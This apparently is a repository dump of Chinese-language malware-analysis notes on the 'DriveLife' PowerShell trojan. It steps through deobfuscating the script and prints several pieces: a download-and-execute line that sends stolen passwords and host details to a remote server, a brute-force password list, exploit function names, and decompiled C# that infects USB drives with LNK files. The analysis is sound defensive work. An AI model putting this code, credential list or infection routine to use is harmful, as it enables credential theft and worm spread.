├── DriveLife ├── ifBin │ ├── if-1-2.ps1 │ ├── if-1.0.ps1 │ ├── if-1.1.ps1 │ ├── if-1.3.ps1 │ ├── if-1.4.ps1 │ ├── if.bin │ └── readme.md ├── images │ ├── BruteSMB.png │ └── GetIpaddrs.png ├── krBin │ ├── kr-1.0.ps1 │ ├── kr-1.1.ps1 │ ├── kr-1.2.ps1 │ ├── kr-1.3.ps1 │ └── kr.bin ├── m6Bin │ ├── m6-1-0.ps1 │ └── m6.bin ├── mimikataz-ps1 │ ├── README.md │ ├── mimi.dat │ └── mimi.ps1 └── powershell-beautiful │ ├── domain-include.txt │ ├── if-1.4.ps1 │ ├── kr-1.3.ps1 │ ├── m6-1-0.ps1 │ ├── mimi.ps1 │ └── readme.md └── README.md /DriveLife/ifBin/if-1-2.ps1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jas502n/DriveLife-PsTrojan/7b60e61404616698052b416e41eca49bdacfd782/DriveLife/ifBin/if-1-2.ps1 -------------------------------------------------------------------------------- /DriveLife/ifBin/readme.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | ``` 4 | $ hash256 if.bin 5 | 989bf47336bf6762a37e90c485199e2cdf0c6ea21ccf6b26845a87e1f8984ab8 if.bin 6 | 7 | ``` 8 | 9 | 10 | ``` 11 | $ file ksegmeve.dll 12 | ksegmeve.dll: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows 13 | 14 | $ hash256 ksegmeve.dll 15 | 51c91efec0126ac197b3dd4b9045a1dbc2eca9c7c7f43d53ebb99377b4388eec ksegmeve.dll 16 | ``` 17 | 18 | 19 | #### 参考链接: 20 | 21 | 2021-09-24 14:24:58 “驱动人生”:老病毒翻出新花样 22 | 23 | https://www.freebuf.com/articles/system/289740.html 24 | 25 | https://edr.sangfor.com.cn/#/information/news_detail?id=761 26 | 27 | 28 | 29 | ### Powershell 解密 30 | 31 | if.bin 文件开头为I`EX 32 | 33 | ``` 34 | I`EX $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$('edbd0 35 | ``` 36 | 37 | 删除 **I`EX**,输出到文件 **if-1.1.bin** 38 | 39 | ``` 40 | $ pwsh -f if-1.0.bin > if-1.1.bin 41 | ``` 42 | 43 | if-1.1.bin 文件内容: 44 | 45 | ```powershell 46 | SeT sPCz ( [ChaR[ ] ]")''NIOj-]2,11,3[EmAN.)'*rDM*' elBAIrav-TEg(( .| )421]RAHc[,)17]RAHc[+68]RAHc[+37]RAHc[( ECALperC-29]RAHc[,'ImS3' eCAlper- 63]RAHc[,'v3bx'ECALperC-93]RAHc[,'5c1t' ECALperC- )' 47 | 48 | ) 49 | ... 50 | ... 51 | ... 52 | [aRraY]::REVERse((cHiLditEM VARiabLE:SpCZ).vaLUe) ;(cHiLditEM VARiabLE:SpCZ).vaLUe -JOIN '' | . ( $PshoMe[4]+$pshOME[30]+'x') 53 | ``` 54 | 55 | 关于PshoMe 56 | 57 | ``` 58 | PS C:\temp> $PSHome 59 | C:\Windows\System32\WindowsPowerShell\v1.0 60 | PS C:\temp> $PshoMe[4]+$pshOME[30]+'x' 61 | iex 62 | ``` 63 | 64 | 注释 IEX, 即 | . ( $PshoMe[4]+$pshOME[30]+'x')** ,运行脚本,输出到 **if-1.2.ps1** 65 | 66 | ```powershell 67 | # | . ( $PshoMe[4]+$pshOME[30]+'x') 68 | ``` 69 | 70 | ```cmd 71 | PS C:\temp> .\if-1-1.bin > if-1.2.ps1 72 | ``` 73 | 74 | if-1.2.ps1 文件内容: 75 | 76 | ```powershell 77 | (('(t1c5wB69sc=[Convert]::FromBase64String(NDckMcBAD4SsB... 78 | ... 79 | ... 80 | ... 81 | ') -CrepLACE 't1c5',[cHAR]39-CrepLACE'xb3v',[cHAR]36 -replACe '3SmI',[cHAR]92-CrepLACE ([cHAR]73+[cHAR]86+[cHAR]71),[cHAR]124) |. ((gET-varIABle '*MDr*').NAmE[3,11,2]-jOIN'') 82 | ``` 83 | 84 | 注释 **|. ((gET-varIABle '*MDr*').NAmE[3,11,2]-jOIN'')** ,运行脚本,输出到 **if-1.3.ps1** 85 | 86 | ``` 87 | # |. ((gET-varIABle '*MDr*').NAmE[3,11,2]-jOIN'') 88 | ``` 89 | 90 | ``` 91 | $ pwsh -f if-1-2.ps1 > if-1.3.ps1 92 | ``` 93 | 94 | if-1.3.ps1 文件内容 95 | 96 | ```powershell 97 | ('wB69sc=[Convert]::FromBase64String(NDckMcBAD4SsBAAAYOgAAAAAW 98 | ... 99 | ... 100 | ... 101 | }').Replace(([CHAR]117+[CHAR]116+[CHAR]72+[CHAR]57),[strINg][CHAR]39).Replace(([CHAR]117+[CHAR]79+[CHAR]118+[CHAR]97),'|').Replace(([CHAR]119+[CHAR]66+[CHAR]54+[CHAR]57),[strINg][CHAR]36).Replace('NDck',[strINg][CHAR]34).Replace(([CHAR]57+[CHAR]101+[CHAR]48),'\').Replace('ir8',[strINg][CHAR]96) | & ( $env:Comspec[4,26,25]-jOiN'') 102 | ``` 103 | 104 | Comspec值 105 | 106 | ```cmd 107 | PS C:\temp> $env:Comspec 108 | C:\Windows\system32\cmd.exe 109 | ``` 110 | 111 | 注释iex 112 | 113 | ``` 114 | #| & ( $env:Comspec[4,26,25]-jOiN'') 115 | ``` 116 | 117 | 运行脚本输入到 **if-1.4.ps1**文件 118 | 119 | ``` 120 | $ pwsh -f if-1.3.ps1 > if-1.4.ps1 121 | ``` 122 | 123 | if-1.4.ps1 文件内容: 124 | 125 | ```powershell 126 | $sc=[Convert]::FromBase64String("McBAD4SsB 127 | ... 128 | ... 129 | ... 130 | IEX(New-Object Net.WebClient).DownloadString($down_url+'/log.json?V='+$VVERSION+'&'+$comp_name+'&'+$guid+'&'+$mac+'&'+$internet_ip+'&r='+$retry+'&pc1='+$smb_portopen[1].count+'&pc2='+$ms_portopen[1].count+'&pc3='+$ssh_portopen[1].count+'&pc4='+$rdp_portopen[1].count+'&pc5='+$redis_portopen[1].count+'&pc6='+$redis_portopen1[1].count+'&pc7='+$yarn_portopen[1].count+'&pc8='+$logic_portopen[1].count+'&pc9='+$es_portopen[1].count+'&pc10='+$solr_portopen[1].count+'&pci='+$ipaddrs_i.count+'&pco='+$ipaddrs_o.count+'&pcb='+$global:ipaddrs_b+'&mi='+($getpasswd -join "^^")+'&mf='+[Int]$mf) 131 | 132 | }catch{} 133 | 134 | } 135 | 136 | 137 | 138 | "END" 139 | 140 | ``` 141 | 142 | #### 获取ip地址: 143 | ``` 144 | function getipaddrs($flag){ 145 | write-host "Get ipaddress..." 146 | $global:ipaddrs_i = @() 147 | $global:ipaddrs_o = @() 148 | $allip = @() 149 | [string[]]$ipsub = @('192.168.0','192.168.1','192.168.2','192.168.3','192.168.4','192.168.5','192.168.6','192.168.7','192.168.8','192.168.9','192.168.10','192.168.18','192.168.31','192.168.199','192.168.254','192.168.67','10.0.0','10.0.1','10.0.2','10.1.1','10.90.90','10.1.10','10.10.1','172.16.1','172.16.2','172.16.3') 150 | [string[]]$ipsub_o = @() 151 | ``` 152 | 153 | #### 爆破密码 154 | 155 | ``` 156 | [string[]]$global: alluser = @("administrator", "admin") 157 | 158 | [string[]]$global:WmicUSER = @("administrator") 159 | 160 | [string[]]$global: allpass = @("helloworld", "saadmin", "123456", "test1", "zinch", "g_czechout", "asdf", "Aa123456.", "dubsmash", "password", "PASSWORD", "123.com", "admin@123", "Aa123456", "qwer12345", "Huawei@123", "123@abc", "golden", "123!@#qwe", "1qaz@WSX", "Ab123", "1qaz!QAZ", "Admin123", "Administrator", "Abc123", "Admin@123", "999999", "Passw0rd", "123qwe!@#", "football", "welcome", "1", "12", "21", "123", "321", "1234", "12345", "123123", "123321", "111111", "654321", "666666", "121212", "000000", "222222", "888888", "1111", "555555", "1234567", "12345678", "123456789", "987654321", "admin", "abc123", "abcd1234", "abcd@1234", "abc@123", "p@ssword", "P@ssword", "p@ssw0rd", "P@ssw0rd", "P@SSWORD", "P@SSW0RD", "P@w0rd", "P@word", "iloveyou", "monkey", "login", "passw0rd", "master", "hello", "qazwsx", "password1", "Password1", "qwerty", "baseball", "qwertyuiop", "superman", "1qaz2wsx", "fuckyou", "123qwe", "zxcvbn", "pass", "aaaaaa", "love", "administrator", "qwe1234A", "qwe1234a", " ", "123123123", "1234567890", "88888888", "111111111", "112233", "a123456", "123456a", "5201314", "1q2w3e4r", "qwe123", "a123456789", "123456789a", "dragon", "sunshine", "princess", "!@#$%^&*", "charlie", "aa123456", "homelesspa", "1q2w3e4r5t", "sa", "sasa", "sa123", "sql2005", "sa2008", "abc", "abcdefg", "sapassword", "Aa12345678", "ABCabc123", "sqlpassword", "sql2008", "11223344", "admin888", "qwe1234", "A123456", "OPERADOR", "Password123", "test123", "NULL", "user", "test", "Password01", "stagiaire", "demo", "scan", "P@ssw0rd123", "xerox", "compta") 161 | ``` 162 | 163 | 爆破密码表整理得到 164 | 165 | ``` 166 | helloworld 167 | saadmin 168 | 123456 169 | test1 170 | zinch 171 | g_czechout 172 | asdf 173 | Aa123456. 174 | dubsmash 175 | password 176 | PASSWORD 177 | 123.com 178 | admin@123 179 | Aa123456 180 | qwer12345 181 | Huawei@123 182 | 123@abc 183 | golden 184 | 123!@#qwe 185 | 1qaz@WSX 186 | Ab123 187 | 1qaz!QAZ 188 | Admin123 189 | Administrator 190 | Abc123 191 | Admin@123 192 | 999999 193 | Passw0rd 194 | 123qwe!@# 195 | football 196 | welcome 197 | 1 198 | 12 199 | 21 200 | 123 201 | 321 202 | 1234 203 | 12345 204 | 123123 205 | 123321 206 | 111111 207 | 654321 208 | 666666 209 | 121212 210 | 000000 211 | 222222 212 | 888888 213 | 1111 214 | 555555 215 | 1234567 216 | 12345678 217 | 123456789 218 | 987654321 219 | admin 220 | abc123 221 | abcd1234 222 | abcd@1234 223 | abc@123 224 | p@ssword 225 | P@ssword 226 | p@ssw0rd 227 | P@ssw0rd 228 | P@SSWORD 229 | P@SSW0RD 230 | P@w0rd 231 | P@word 232 | iloveyou 233 | monkey 234 | login 235 | passw0rd 236 | master 237 | hello 238 | qazwsx 239 | password1 240 | Password1 241 | qwerty 242 | baseball 243 | qwertyuiop 244 | superman 245 | 1qaz2wsx 246 | fuckyou 247 | 123qwe 248 | zxcvbn 249 | pass 250 | aaaaaa 251 | love 252 | administrator 253 | qwe1234A 254 | qwe1234a 255 | 256 | 123123123 257 | 1234567890 258 | 88888888 259 | 111111111 260 | 112233 261 | a123456 262 | 123456a 263 | 5201314 264 | 1q2w3e4r 265 | qwe123 266 | a123456789 267 | 123456789a 268 | dragon 269 | sunshine 270 | princess 271 | !@#$%^&* 272 | charlie 273 | aa123456 274 | homelesspa 275 | 1q2w3e4r5t 276 | sa 277 | sasa 278 | sa123 279 | sql2005 280 | sa2008 281 | abc 282 | abcdefg 283 | sapassword 284 | Aa12345678 285 | ABCabc123 286 | sqlpassword 287 | sql2008 288 | 11223344 289 | admin888 290 | qwe1234 291 | A123456 292 | OPERADOR 293 | Password123 294 | test123 295 | NULL 296 | user 297 | test 298 | Password01 299 | stagiaire 300 | demo 301 | scan 302 | P@ssw0rd123 303 | xerox 304 | compta 305 | ``` 306 | 307 | 308 | 309 | 自定义的函数: 310 | 311 | ```powershell 312 | function make_smb1_anonymous_login_packet { 313 | function smb1_anonymous_login($sock){ 314 | function negotiate_proto_request(){ 315 | function smb_header($smbheader) { 316 | function smb1_get_response($sock){ 317 | function client_negotiate($sock){ 318 | function tree_connect_andx($sock, $target, $userid){ 319 | function tree_connect_andx_request($target, $userid) { 320 | function smb1_anonymous_connect_ipc($target){ 321 | function make_smb1_nt_trans_packet($tree_id, $user_id) { 322 | function make_smb1_trans2_exploit_packet($tree_id, $user_id, $data, $timeout) { 323 | function make_smb1_trans2_last_packet($tree_id, $user_id, $data, $timeout) { 324 | function send_big_trans2($sock, $smbheader, $data, $firstDataFragmentSize, $sendLastChunk){ 325 | function createSessionAllocNonPaged($target, $size) { 326 | function make_smb1_free_hole_session_packet($flags2, $vcnum, $native_os) { 327 | function smb2_grooms($target, $grooms, $payload_hdr_pkt, $groom_socks){ 328 | function make_smb2_payload_headers_packet(){ 329 | function eb7($target ,$shellcode) { 330 | function createFakeSrvNetBuffer8($sc_size) 331 | function createFeaList8($sc_size, $ntfea){ 332 | function make_smb1_login8_packet8 { 333 | function make_ntlm_auth_packet8($user_id) { 334 | function smb1_login8($sock){ 335 | function negotiate_proto_request8($use_ntlm) 336 | function smb_header8($smbheader) { 337 | function smb1_get_response8($sock){ 338 | function client_negotiate8($sock , $use_ntlm){ 339 | function tree_connect_andx8($sock, $target, $userid){ 340 | function tree_connect_andx8_request($target, $userid) { 341 | function make_smb1_nt_trans_packet8($tree_id, $user_id) { 342 | function make_smb1_trans2_exploit_packet8($tree_id, $user_id, $data, $timeout) { 343 | function send_big_trans28($sock, $smbheader, $data, $firstDataFragmentSize, $sendLastChunk){ 344 | function createSessionAllocNonPaged8($target, $size) { 345 | function make_smb1_free_hole_session_packet8($flags2, $vcnum, $native_os) { 346 | function make_smb2_payload_headers_packet8($for_nx){ 347 | function eb8($target,$sc) { 348 | function geth { 349 | function LoadApi 350 | function sid_to_key($sid) 351 | function str_to_key($s) 352 | function NewRC4([byte[]]$key) 353 | function des_encrypt([byte[]]$data, [byte[]]$key) 354 | function des_decrypt([byte[]]$data, [byte[]]$key) 355 | function des_transform([byte[]]$data, [byte[]]$key, $doEncrypt) 356 | function Get-RegKeyClass([string]$key, [string]$subkey) 357 | function Get-BootKey 358 | function Get-HBootKey 359 | function Get-UserName([byte[]]$V) 360 | function Get-UserHashes($u, [byte[]]$hbootkey) 361 | function DecryptHashes($rid, [byte[]]$enc_lm_hash, [byte[]]$enc_nt_hash, [byte[]]$hbootkey) 362 | function DecryptSingleHash($rid,[byte[]]$hbootkey,[byte[]]$enc_hash,[byte[]]$lmntstr) 363 | function Get-UserKeys 364 | function DumpHashes 365 | function Invoke-Mypass { 366 | function Invoke-SE 367 | function ConvertFrom-PacketOrderedDictionary 368 | function New-PacketNetBIOSSessionService 369 | function New-PacketSMBHeader 370 | function New-PacketSMBNegotiateProtocolRequest 371 | function New-PacketSMBSessionSetupAndXRequest 372 | function New-PacketSMBTreeConnectAndXRequest 373 | function New-PacketSMBNTCreateAndXRequest 374 | function New-PacketSMBReadAndXRequest 375 | function New-PacketSMBWriteAndXRequest 376 | function New-PacketSMBCloseRequest 377 | function New-PacketSMBTreeDisconnectRequest 378 | function New-PacketSMBLogoffAndXRequest 379 | function New-PacketSMB2Header 380 | function New-PacketSMB2NegotiateProtocolRequest 381 | function New-PacketSMB2SessionSetupRequest 382 | function New-PacketSMB2TreeConnectRequest 383 | function New-PacketSMB2CreateRequestFile 384 | function New-PacketSMB2ReadRequest 385 | function New-PacketSMB2WriteRequest 386 | function New-PacketSMB2CloseRequest 387 | function New-PacketSMB2TreeDisconnectRequest 388 | function New-PacketSMB2SessionLogoffRequest 389 | function New-PacketNTLMSSPNegotiate 390 | function New-PacketNTLMSSPAuth 391 | function New-PacketRPCBind 392 | function New-PacketRPCRequest 393 | function New-PacketSCMOpenSCManagerW 394 | function New-PacketSCMCreateServiceW 395 | function New-PacketSCMStartServiceW 396 | function New-PacketSCMDeleteServiceW 397 | function New-PacketSCMCloseServiceHandle 398 | function Get-StatusPending 399 | function Get-UInt16DataLength 400 | function Invoke-SMBC 401 | function ConvertFrom-PacketOrderedDictionary 402 | function New-PacketNetBIOSSessionService 403 | function New-PacketSMBHeader 404 | function New-PacketSMBNegotiateProtocolRequest 405 | function New-PacketSMBSessionSetupAndXRequest 406 | function New-PacketSMB2Header 407 | function New-PacketSMB2NegotiateProtocolRequest 408 | function New-PacketSMB2SessionSetupRequest 409 | function New-PacketSMB2TreeConnectRequest 410 | function New-PacketSMB2CreateRequest 411 | function New-PacketSMB2FindRequestFile 412 | function New-PacketSMB2QueryInfoRequest 413 | function New-PacketSMB2ReadRequest 414 | function New-PacketSMB2WriteRequest 415 | function New-PacketSMB2CloseRequest 416 | function New-PacketSMB2TreeDisconnectRequest 417 | function New-PacketSMB2SessionLogoffRequest 418 | function New-PacketSMB2IoctlRequest() 419 | function New-PacketSMB2SetInfoRequest 420 | function New-PacketNTLMSSPNegotiate 421 | function New-PacketNTLMSSPAuth 422 | function Get-UInt16DataLength 423 | function smbghost_check($tip) { 424 | function check_vul($sock) { 425 | function smbghost_exec($ip,$cmd){ 426 | function unpack($pkt_str) { 427 | function pack($pkt) { 428 | function reconnect(){ 429 | function sock_recv($sock) { 430 | function smb_negotiate($sock){ 431 | function Smb2CompressedTransform($compressed_data, $decompressed_size, $data){ 432 | function smb_compress($sock, $compressed_data, $decompressed_size, $data){ 433 | function MDL($phys_addr){ 434 | function write_primitive($data,$addr){ 435 | function write_srvnet_buffer_hdr($data, $offset){ 436 | function read_physmem_primitive($phys_addr){ 437 | function get_phys_addr($va_addr){ 438 | function get_pte_va($addr){ 439 | function overwrite_pte($addr){ 440 | function build_shellcode(){ 441 | function search_hal_heap(){ 442 | function search_selfref(){ 443 | function find_pml4_selfref(){ 444 | function find_low_stub(){ 445 | function do_rce(){ 446 | function copyrun { 447 | function db_query{ 448 | function db_gencmd{ 449 | function mssqlrun { 450 | function sshbrute($ip,$user,$pass,$ssh_cmd){ 451 | function isPubIP { 452 | function getipaddrs($flag){ 453 | function localscan { 454 | function redisexec($ip,$port,$cmd){ 455 | function sendandread($sock,$str){ 456 | function yarnexec($ip,$cmd){ 457 | function urlpost($ip,$path,$data){ 458 | function logicexec($ip,$cmd){ 459 | function esexec($ip,$cmd){ 460 | function urlrequest($ip,$path,$data){ 461 | function solrexec($ip,$cmd){ 462 | function urlrequest($ip,$path,$data){ 463 | function f1(data){new java.lang.ProcessBuilder["(java.lang.String[])"]($cmdlist).start()} 464 | function dockerexec($ip,$cmd){ 465 | function urlrequest($ip,$path,$data){ 466 | function Gen-NTLM($str){ 467 | ``` 468 | 469 | 470 | #### ksegmeve.dll for dnspy 471 | https://github.com/dnSpy/dnSpy/releases 472 | 473 | ``` 474 | using System; 475 | using System.Collections.Generic; 476 | using System.IO; 477 | using System.Threading; 478 | 479 | namespace USB 480 | { 481 |     // Token: 0x02000002 RID: 2 482 |     public class USBLNK 483 |     { 484 |         // Token: 0x06000001 RID: 1 RVA: 0x00002050 File Offset: 0x00000250 485 |         public static void Main1(string b1, string b2, string b3) 486 |         { 487 |             USBLNK.gb3 = b1; 488 |             USBLNK.gb6 = b2; 489 |             USBLNK.jsdata = b3; 490 |             Timer timer = new Timer(new TimerCallback(USBLNK.ResetBlacklist), null, 10000, 10000); 491 |             for (;;) 492 |             { 493 |                 USBLNK.BaseMode(); 494 |                 Thread.Sleep(5000); 495 |             } 496 |         } 497 | 498 |         // Token: 0x06000002 RID: 2 RVA: 0x000020A5 File Offset: 0x000002A5 499 |         private static void ResetBlacklist(object state) 500 |         { 501 |             USBLNK.blacklist.Clear(); 502 |         } 503 | 504 |         // Token: 0x06000003 RID: 3 RVA: 0x000020B4 File Offset: 0x000002B4 505 |         private static bool CreateHomeDirectory(string drive) 506 |         { 507 |             try 508 |             { 509 |                 DirectoryInfo directoryInfo = Directory.CreateDirectory(drive + "UTFsync"); 510 |                 directoryInfo.Attributes = (FileAttributes.Hidden | FileAttributes.Directory); 511 |                 return true; 512 |             } 513 |             catch 514 |             { 515 |             } 516 |             return false; 517 |         } 518 | 519 |         // Token: 0x06000004 RID: 4 RVA: 0x00002100 File Offset: 0x00000300 520 |         private static bool IsSupported(DriveInfo drive) 521 |         { 522 |             return drive.IsReady && drive.AvailableFreeSpace > 1024L && (drive.DriveType == DriveType.Removable || drive.DriveType == DriveType.Network) && (drive.DriveFormat == "FAT32" || drive.DriveFormat == "NTFS"); 523 |         } 524 | 525 |         // Token: 0x06000005 RID: 5 RVA: 0x00002164 File Offset: 0x00000364 526 |         private static bool CheckBlacklist(string name) 527 |         { 528 |             return name == "UTFsync" || name == "System Volume Information" || name == ".BIN"; 529 |         } 530 | 531 |         // Token: 0x06000006 RID: 6 RVA: 0x000021A0 File Offset: 0x000003A0 532 |         private static bool Infect(string drive) 533 |         { 534 |             bool result; 535 |             if (USBLNK.blacklist.Contains(drive)) 536 |             { 537 |                 result = true; 538 |             } 539 |             else 540 |             { 541 |                 USBLNK.CreateLnk(drive, "blue3.bin", USBLNK.gb3); 542 |                 USBLNK.CreateLnk(drive, "blue6.bin", USBLNK.gb6); 543 |                 USBLNK.CreateJs(drive, "readme.js", USBLNK.jsdata); 544 |                 try 545 |                 { 546 |                     File.Create(drive + "UTFsync\\inf_data"); 547 |                     return true; 548 |                 } 549 |                 catch (Exception ex) 550 |                 { 551 |                     Console.WriteLine(ex.Message); 552 |                 } 553 |                 result = false; 554 |             } 555 |             return result; 556 |         } 557 | 558 |         // Token: 0x06000007 RID: 7 RVA: 0x00002238 File Offset: 0x00000438 559 |         private static bool CreateJs(string drive, string fname, string gb) 560 |         { 561 |             FileStream fileStream = new FileStream(drive + fname, FileMode.Create); 562 |             byte[] array = Convert.FromBase64String(gb); 563 |             fileStream.Write(array, 0, array.Length); 564 |             fileStream.Close(); 565 |             Console.WriteLine(array.Length); 566 |             return true; 567 |         } 568 | 569 |         // Token: 0x06000008 RID: 8 RVA: 0x00002368 File Offset: 0x00000568 570 |         private static bool CreateLnk(string drive, string binfname, string gb) 571 |         { 572 |             byte[] array = new byte[] 573 |             { 574 |                 76, 575 |                 0, 576 |                 0, 577 |                 0, 578 |                 1, 579 |                 20, 580 |                 2, 581 |                 0, 582 |                 0, 583 |                 0, 584 |                 0, 585 |                 0, 586 |                 192, 587 |                 0, 588 |                 0, 589 |                 0, 590 |                 0, 591 |                 0, 592 |                 0, 593 |                 70, 594 |                 129, 595 |                 0, 596 |                 0, 597 |                 0, 598 |                 0, 599 |                 0, 600 |                 0, 601 |                 0, 602 |                 0, 603 |                 0, 604 |                 0, 605 |                 0, 606 |                 0, 607 |                 0, 608 |                 0, 609 |                 0, 610 |                 0, 611 |                 0, 612 |                 0, 613 |                 0, 614 |                 0, 615 |                 0, 616 |                 0, 617 |                 0, 618 |                 0, 619 |                 0, 620 |                 0, 621 |                 0, 622 |                 0, 623 |                 0, 624 |                 0, 625 |                 0, 626 |                 0, 627 |                 0, 628 |                 0, 629 |                 0, 630 |                 0, 631 |                 0, 632 |                 0, 633 |                 0, 634 |                 0, 635 |                 0, 636 |                 0, 637 |                 0, 638 |                 0, 639 |                 0, 640 |                 0, 641 |                 0, 642 |                 0, 643 |                 0, 644 |                 0, 645 |                 0, 646 |                 0, 647 |                 0, 648 |                 0, 649 |                 0, 650 |                 156, 651 |                 0, 652 |                 20, 653 |                 0, 654 |                 31, 655 |                 128, 656 |                 32, 657 |                 32, 658 |                 236, 659 |                 33, 660 |                 234, 661 |                 58, 662 |                 105, 663 |                 16, 664 |                 162, 665 |                 221, 666 |                 8, 667 |                 0, 668 |                 43, 669 |                 48, 670 |                 48, 671 |                 157, 672 |                 134, 673 |                 0, 674 |                 0, 675 |                 0, 676 |                 0, 677 |                 0, 678 |                 0, 679 |                 0, 680 |                 0, 681 |                 0, 682 |                 0, 683 |                 0, 684 |                 0, 685 |                 106, 686 |                 0, 687 |                 0, 688 |                 0, 689 |                 0, 690 |                 0, 691 |                 0 692 |             }; 693 |             byte[] array2 = new byte[] 694 |             { 695 |                 58, 696 |                 0, 697 |                 92 698 |             }; 699 |             byte[] array3 = new byte[] 700 |             { 701 |                 0, 702 |                 0, 703 |                 0, 704 |                 70, 705 |                 0, 706 |                 108, 707 |                 0, 708 |                 97, 709 |                 0, 710 |                 115, 711 |                 0, 712 |                 104, 713 |                 0, 714 |                 32, 715 |                 0, 716 |                 80, 717 |                 0, 718 |                 108, 719 |                 0, 720 |                 97, 721 |                 0, 722 |                 121, 723 |                 0, 724 |                 101, 725 |                 0, 726 |                 114, 727 |                 0, 728 |                 0, 729 |                 0, 730 |                 77, 731 |                 0, 732 |                 97, 733 |                 0, 734 |                 110, 735 |                 0, 736 |                 97, 737 |                 0, 738 |                 103, 739 |                 0, 740 |                 101, 741 |                 0, 742 |                 32, 743 |                 0, 744 |                 70, 745 |                 0, 746 |                 108, 747 |                 0, 748 |                 97, 749 |                 0, 750 |                 115, 751 |                 0, 752 |                 104, 753 |                 0, 754 |                 32, 755 |                 0, 756 |                 80, 757 |                 0, 758 |                 108, 759 |                 0, 760 |                 97, 761 |                 0, 762 |                 121, 763 |                 0, 764 |                 101, 765 |                 0, 766 |                 114, 767 |                 0, 768 |                 32, 769 |                 0, 770 |                 83, 771 |                 0, 772 |                 101, 773 |                 0, 774 |                 116, 775 |                 0, 776 |                 116, 777 |                 0, 778 |                 105, 779 |                 0, 780 |                 110, 781 |                 0, 782 |                 103, 783 |                 0, 784 |                 115, 785 |                 0, 786 |                 0, 787 |                 0, 788 |                 0, 789 |                 0, 790 |                 16, 791 |                 0, 792 |                 0, 793 |                 0, 794 |                 5, 795 |                 0, 796 |                 0, 797 |                 160, 798 |                 3, 799 |                 0, 800 |                 0, 801 |                 0, 802 |                 20, 803 |                 0, 804 |                 0, 805 |                 0, 806 |                 0, 807 |                 0, 808 |                 0, 809 |                 0 810 |             }; 811 |             for (char c = 'D'; c <= 'K'; c += '\u0001') 812 |             { 813 |                 FileStream fileStream = new FileStream(drive + c.ToString() + binfname.Replace(".bin", ".lnk"), FileMode.Create); 814 |                 fileStream.Write(array, 0, array.Length); 815 |                 byte[] array4 = new byte[4]; 816 |                 int num = binfname.Length + 4; 817 |                 array4[0] = (byte)(num & 255); 818 |                 array4[1] = (byte)((num & 65280) >> 8); 819 |                 array4[2] = 13; 820 |                 array4[3] = 0; 821 |                 fileStream.Write(array4, 0, array4.Length); 822 |                 byte[] array5 = new byte[] 823 |                 { 824 |                     (byte)(c & 'ÿ'), 825 |                     (byte)((c & '＀') >> 8) 826 |                 }; 827 |                 fileStream.Write(array5, 0, array5.Length); 828 |                 fileStream.Write(array2, 0, array2.Length); 829 |                 foreach (char c2 in binfname) 830 |                 { 831 |                     byte[] array6 = new byte[] 832 |                     { 833 |                         (byte)((c2 & '＀') >> 8), 834 |                         (byte)(c2 & 'ÿ') 835 |                     }; 836 |                     fileStream.Write(array6, 0, array6.Length); 837 |                 } 838 |                 fileStream.Write(array3, 0, array3.Length); 839 |                 fileStream.Close(); 840 |             } 841 |             FileStream fileStream2 = new FileStream(drive + binfname, FileMode.Create); 842 |             byte[] array7 = Convert.FromBase64String(gb); 843 |             fileStream2.Write(array7, 0, array7.Length); 844 |             fileStream2.Close(); 845 |             Console.WriteLine(array7.Length); 846 |             return true; 847 |         } 848 | 849 |         // Token: 0x06000009 RID: 9 RVA: 0x00002540 File Offset: 0x00000740 850 |         private static void BaseMode() 851 |         { 852 |             DriveInfo[] drives = DriveInfo.GetDrives(); 853 |             foreach (DriveInfo driveInfo in drives) 854 |             { 855 |                 if (!USBLNK.blacklist.Contains(driveInfo.Name)) 856 |                 { 857 |                     Console.WriteLine("Detect drive:" + driveInfo.Name); 858 |                     if (USBLNK.IsSupported(driveInfo)) 859 |                     { 860 |                         if (!File.Exists(driveInfo + "UTFsync\\inf_data")) 861 |                         { 862 |                             Console.WriteLine("Try to infect " + driveInfo.Name); 863 |                             if (USBLNK.CreateHomeDirectory(driveInfo.Name) && USBLNK.Infect(driveInfo.Name)) 864 |                             { 865 |                                 USBLNK.blacklist.Add(driveInfo.Name); 866 |                             } 867 |                         } 868 |                         else 869 |                         { 870 |                             Console.WriteLine(driveInfo.Name + " already infected!"); 871 |                             USBLNK.blacklist.Add(driveInfo.Name); 872 |                         } 873 |                     } 874 |                     else 875 |                     { 876 |                         USBLNK.blacklist.Add(driveInfo.Name); 877 |                     } 878 |                 } 879 |             } 880 |         } 881 | 882 |         // Token: 0x04000001 RID: 1 883 |         private const string home = "UTFsync"; 884 | 885 |         // Token: 0x04000002 RID: 2 886 |         private const string inf_data = "\\inf_data"; 887 | 888 |         // Token: 0x04000003 RID: 3 889 |         public static List blacklist = new List(); 890 | 891 |         // Token: 0x04000004 RID: 4 892 |         public static string gb3; 893 | 894 |         // Token: 0x04000005 RID: 5 895 |         public static string gb6; 896 | 897 |         // Token: 0x04000006 RID: 6 898 |         public static string jsdata; 899 |     } 900 | } 901 | 902 | ``` 903 | 904 | -------------------------------------------------------------------------------- /DriveLife/images/BruteSMB.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jas502n/DriveLife-PsTrojan/7b60e61404616698052b416e41eca49bdacfd782/DriveLife/images/BruteSMB.png -------------------------------------------------------------------------------- /DriveLife/images/GetIpaddrs.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jas502n/DriveLife-PsTrojan/7b60e61404616698052b416e41eca49bdacfd782/DriveLife/images/GetIpaddrs.png -------------------------------------------------------------------------------- /DriveLife/krBin/kr-1.0.ps1: -------------------------------------------------------------------------------- 1 | [STrInG]::join( '',( [ReGeX]::mAtChES("NoiSSErPXe-EKoVNi | )'`',)601]Rahc[+07]Rahc[+55]Rahc[((EcAlpEr.)421]Rahc[]gNIRts[,'JP6'(EcAlpEr.)'$',)87]Rahc[+86]Rahc[+67]Rahc[((EcAlpEr.)93]Rahc[]gNIRts[,)121]Rahc[+37]Rahc[+08]Rahc[((EcAlpEr.)' 2 | 3 | 